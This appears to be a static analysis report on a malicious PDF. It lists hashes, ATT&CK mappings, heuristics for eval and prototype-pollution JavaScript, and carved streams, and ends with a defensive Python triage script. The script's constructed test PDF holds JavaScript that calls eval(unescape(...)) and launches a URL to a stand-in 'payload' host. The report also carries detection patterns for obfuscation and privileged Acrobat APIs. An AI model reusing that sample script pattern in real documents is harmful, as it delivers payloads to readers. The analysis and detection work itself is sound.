Malicious PDF — malware analysis report

Static analysis result for SHA-256 d0b0780cb055e2cf…

Verdict: MALICIOUS
File type: PDF
Size: 1.39 MB
MD5: e2362bd9fda2d68118b18f3a24e24c77
SHA-1: f04f490e1d6a55181366b9cdf203f08b339cc28f
SHA-256: d0b0780cb055e2cf2f39a8b66e26810bc31942fd7b807f6382ff70ccc628cbac
Risk score: 126

Malware Insights

MITRE ATT&CK
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1059.007 Command and Scripting Interpreter: JavaScript

The PDF contains multiple embedded JavaScript streams. The largest of them (the roughly 1 MB stream_009 artifact listed below) contains eval() calls and prototype pollution patterns, which suggests the script de-obfuscates and executes further code at runtime. Together with the XFA form and the embedded scripts, this points to the document being a delivery mechanism for a secondary payload; the nature of that payload cannot be determined from static analysis alone. No network IOCs (URLs or hashes) were extracted from the script content: the only URLs found anywhere in the file are XMP/RDF namespace identifiers from the document metadata, not network destinations. Note also that the T1059.001 (PowerShell) mapping is not corroborated by any artifact in this report, since the heuristics found no Windows shell-execution primitives; treat it as an inference about the suspected second stage rather than an observed behaviour.

Machine Learning

  • Nyx PDF Classifier: suspicious score 0.3093

Heuristics (8)

  • Prototype-pollution JavaScript pattern [high, CVE-related] PDF_JS_PROTOTYPE_POLLUTION
    PDF JavaScript mutates object prototypes while also referencing privileged or sensitive PDF APIs. This tracks a modern PDF exploit technique family without assigning an unverified CVE.
  • eval() call [high] PDF_EVAL
    eval() found; commonly used to execute obfuscated exploit code (matched inside a decoded stream).
  • Embedded script payload in PDF stream [medium] PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives. Common in accessible XFA forms, but worth surfacing for analyst review.
  • XFA form [low] PDF_XFA
    PDF uses XML Forms Architecture, which can carry script logic.
  • JavaScript action [low] PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules (matched inside a decoded stream).
  • Embedded JS stream [low] PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules (matched inside a decoded stream).
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL channel labels (macro, JS, link annotation, document body, ...) indicate how each URL was reached. All six URLs below are namespace URIs from the file's XMP metadata and XFA markup (RDF syntax, Adobe XMP, Dublin Core, XFA); they are identifiers, not network indicators.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/
    • http://ns.adobe.com/pdf/1.3/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xfa/promoted-desc/

Extracted artifacts (19)

Files carved from inside the sample during analysis.

Each entry gives the carved filename, its SHA-256, the artifact kind, where in the PDF it came from, and its size as carved.

  • stream_002_off0000034e.js
    SHA-256: f8721569904600df33f536ddc9f4942717077f9d6c3c4253a8f4de5650fc6531
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0x34E; 1367 bytes
  • stream_003_off00000534.js
    SHA-256: 91ea259764c68d27b8981a339c02d8ea92224ae5c0d0cd0a7c8f3d645d599090
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0x534; 902 bytes
  • stream_008_off00000e6b.js
    SHA-256: 6e568a1338babb171f964d835d60a1f5c1d9527ce6987e21aca56a3e3e4b9cc0
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0xE6B; 2423 bytes
  • stream_009_off00001239.js
    SHA-256: 49fbb9f080ff25fd35b7d18defa8b4d883eb91f369cb60256610528f5be308f8
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0x1239; 1019156 bytes
    Detection: ClamAV: No threats found. Obfuscation or payload: likely. Carved artifact contains 5 eval/decoder/string-building token(s) and 4 long base64-like blob(s).
  • stream_010_off00036f05.bin
    SHA-256: b16a77f36a1dbb10b68158d5bc3bc5894c1696984d4fcfb18db002aa5ca6cb65
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0x36F05; 5711 bytes
  • stream_011_off0003737d.bin
    SHA-256: cac9c34aeab80f505296f22cac62dc239a5cea1ffae6361d1991c279d415fadb
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0x3737D; 47559 bytes
  • stream_012_off0003833f.bin
    SHA-256: 8ed9cdaaef2aa769579a4ba835e39256b1c3971f55aa85f7b7c268d675cc53f7
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0x3833F; 8178 bytes
  • stream_013_off00038a98.bin
    SHA-256: 82883b1c356644ec1217b1e20b594e85f02d0657b4324c7bfe032e52e5e13b8e
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0x38A98; 374 bytes
  • stream_015_off0003aa7e.bin
    SHA-256: 04d0c9976d81c8ac08186397a6e1b0eda7a6896713d9d7591343b1b07999ec47
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0x3AA7E; 895200 bytes
  • stream_023_off0008cfdb.bin
    SHA-256: b2a50460b1fc66b7680230c728241859435e1af538bd15e880282e123198de62
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0x8CFDB; 102219 bytes
  • stream_024_off0009e950.bin
    SHA-256: f13c106e4ee427254e92d68485d1420403c9e874eee0f33787ff10fe62f8018f
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0x9E950; 188972 bytes
  • stream_025_off000be59b.bin
    SHA-256: 55cb4b903a99e15bba7a1da6ca466776cafcadab161604e20e685e4472952dcf
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0xBE59B; 196605 bytes
  • stream_026_off000df735.bin
    SHA-256: b8e2518b116c26bab0e9f8c1672daf405dedad561157502b657e9005be2029aa
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0xDF735; 367087 bytes
  • stream_028_off00130dd2.bin
    SHA-256: 1e8564d3d89047875dccaa98279599de9d7ddf77240906041f1156ba8edf3315
    decompressed-pdf-stream; PDF FlateDecoded stream at offset 0x130DD2; 352198 bytes
  • objstm_0067_00.bin
    SHA-256: fe1b0511b757619b151d5ed2d12acf276d811f46e18d3442c1f9a1daec32b1e0
    pdf-objstm-decoded; PDF /ObjStm 67 0 obj (inflated); 807 bytes
  • font_00_sfnt_off0004990d.bin
    SHA-256: c29e5b1537bee8c88b3ffca56c5f24a45ec8da374cf9d4c0b4a78d04fc230949
    pdf-font-stream; PDF embedded font (sfnt) at offset 0x4990D; 95975 bytes
  • font_01_sfnt_off00059bf2.bin
    SHA-256: 4f8a962143becce891b0f8d40b5315e54e2a298ba661302850ebd34e48af909a
    pdf-font-stream; PDF embedded font (sfnt) at offset 0x59BF2; 99778 bytes
  • font_02_sfnt_off0006aead.bin
    SHA-256: b1260c85fef77007b5f19c1c6f3552e1c6ade6c959082cf86dd6971951ed119c
    pdf-font-stream; PDF embedded font (sfnt) at offset 0x6AEAD; 102071 bytes
  • font_03_sfnt_off0007c8c5.bin
    SHA-256: 926d8eb5abd4c74e46a419aaf25a490564d389c7a250d2392b198a342df65b8a
    pdf-font-stream; PDF embedded font (sfnt) at offset 0x7C8C5; 97320 bytes
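As an added example (not code or output from the analysis engine that produced this report), the Python script below carves FlateDecode streams from a PDF the way the artifact table describes them (body offset, decoded size, SHA-256) and runs triage checks modelled on the heuristics listed earlier: eval/decoder tokens, prototype mutation co-occurring with privileged Acrobat JavaScript APIs, long base64-like blobs, <script> tags, and URL extraction that sets aside XMP namespace URIs. The regular expressions, the privileged-API list and the two-stream sample PDF it builds are this example's own assumptions; the sample is constructed and is not the analysed file.

```python
"""Carve FlateDecode streams from a PDF and run static triage on the decoded bytes.

Miniature version of the checks named in the report (PDF_EVAL, PDF_JS_PROTOTYPE_POLLUTION,
PDF_EMBEDDED_SCRIPT_PAYLOAD, base64-blob counting, EMBEDDED_URL).  All patterns and the
privileged-API list are this example's assumptions, not the analysis engine's rules.
"""
import hashlib
import re
import zlib

# Stream object: dictionary, 'stream' keyword, raw body, 'endstream'.  The tempered dot
# stops the dictionary match from running across 'endobj' into the next object; the body
# is cut at the first 'endstream' (fine for triage; a real parser honours /Length).
STREAM_RE = re.compile(rb"<<((?:(?!endobj).)*?)>>\s*stream\r?\n(.*?)endstream", re.DOTALL)

EVAL_TOKENS = re.compile(r"\b(?:eval|unescape|String\.fromCharCode|atob)\s*\(")
PROTO_MUTATION = re.compile(
    r"\.prototype\.\w+\s*=(?!=)|__proto__|Object\.defineProperty\s*\(\s*[\w.]*prototype")
# Acrobat JavaScript APIs worth flagging when they co-occur with prototype mutation
# (illustrative subset; an assumption of this example).
PRIVILEGED_API = re.compile(
    r"\b(?:app\.\w+|util\.\w+|Collab\.\w+|this\.(?:exportDataObject|importDataObject|submitForm|getURL))")
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
JS_HINT = re.compile(rb"\b(?:var|function|eval)\b")
# XMP/RDF namespace URIs appear in the metadata of ordinary PDFs; they are not network IOCs.
METADATA_NS_PREFIXES = ("http://ns.adobe.com/", "http://purl.org/dc/",
                        "http://www.w3.org/1999/02/22-rdf-syntax-ns")


def inflate(raw: bytes) -> bytes:
    """Inflate via decompressobj so EOL bytes before 'endstream' are ignored as trailing data."""
    d = zlib.decompressobj()
    try:
        return d.decompress(raw) + d.flush()
    except zlib.error:
        return b""


def triage(data: bytes) -> dict:
    """Static checks over one decoded stream, keyed by the report's heuristic names."""
    text = data.decode("latin-1")
    urls = URL_RE.findall(text)
    return {
        "eval_tokens": len(EVAL_TOKENS.findall(text)),
        "base64_blobs": len(BASE64_BLOB.findall(text)),
        "PDF_EVAL": bool(EVAL_TOKENS.search(text)),
        "PDF_JS_PROTOTYPE_POLLUTION": bool(PROTO_MUTATION.search(text)) and bool(PRIVILEGED_API.search(text)),
        "PDF_EMBEDDED_SCRIPT_PAYLOAD": bool(SCRIPT_TAG.search(text)),
        "ioc_urls": [u for u in urls if not u.startswith(METADATA_NS_PREFIXES)],
    }


def carve_streams(pdf: bytes) -> list:
    """One record per inflatable FlateDecode stream: body offset, decoded size, SHA-256, kind, triage."""
    records = []
    for m in STREAM_RE.finditer(pdf):
        if b"/FlateDecode" not in m.group(1):
            continue
        data = inflate(m.group(2))
        if not data:
            continue
        records.append({
            "offset": m.start(2),           # offset of the first compressed byte
            "size": len(data),              # decompressed size, as in the artifact table
            "sha256": hashlib.sha256(data).hexdigest(),
            "kind": "js" if JS_HINT.search(data) else "bin",
            "triage": triage(data),
        })
    return records


def _stream_obj(num: int, entries: bytes, payload: bytes) -> bytes:
    comp = zlib.compress(payload)
    return (b"%d 0 obj\n<< %s /Filter /FlateDecode /Length %d >>\nstream\n" % (num, entries, len(comp))
            + comp + b"\nendstream\nendobj\n")


# Constructed sample script (not the analysed file's code): prototype mutation, a long
# base64-like blob, eval()/unescape(), and a privileged API reaching a URL.
SAMPLE_JS = (b"Array.prototype.push = function () {};\n"
             b"var p = '" + b"QUJDREVG" * 30 + b"';\n"
             b"eval(unescape(p));\n"
             b"app.launchURL('http://example.invalid/payload', true);\n")


def build_sample_pdf() -> bytes:
    """Constructed two-stream PDF: an XMP metadata stream plus an /OpenAction JavaScript stream."""
    xmp = (b'<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" '
           b'xmlns:pdf="http://ns.adobe.com/pdf/1.3/"></rdf:RDF>')
    return (b"%PDF-1.7\n"
            b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /Metadata 3 0 R /OpenAction 4 0 R >>\nendobj\n"
            b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
            + _stream_obj(3, b"/Type /Metadata /Subtype /XML", xmp)
            + b"4 0 obj\n<< /S /JavaScript /JS 5 0 R >>\nendobj\n"
            + _stream_obj(5, b"", SAMPLE_JS)
            + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    for r in carve_streams(build_sample_pdf()):
        print(f"0x{r['offset']:X} {r['size']:>6} bytes {r['kind']} {r['sha256'][:16]}... {r['triage']}")
```

Run directly, it prints one line per carved stream: the metadata stream comes out as `bin` with no IOC URLs (its two namespace URIs are filtered), while the JavaScript stream is flagged for PDF_EVAL and PDF_JS_PROTOTYPE_POLLUTION with one base64-like blob and one retained URL. On a real sample, expect offsets to differ from another tool's by a few bytes depending on whether it records the object header or the stream body, and replace the lazy `endstream` cut with /Length handling when binary bodies might contain that keyword.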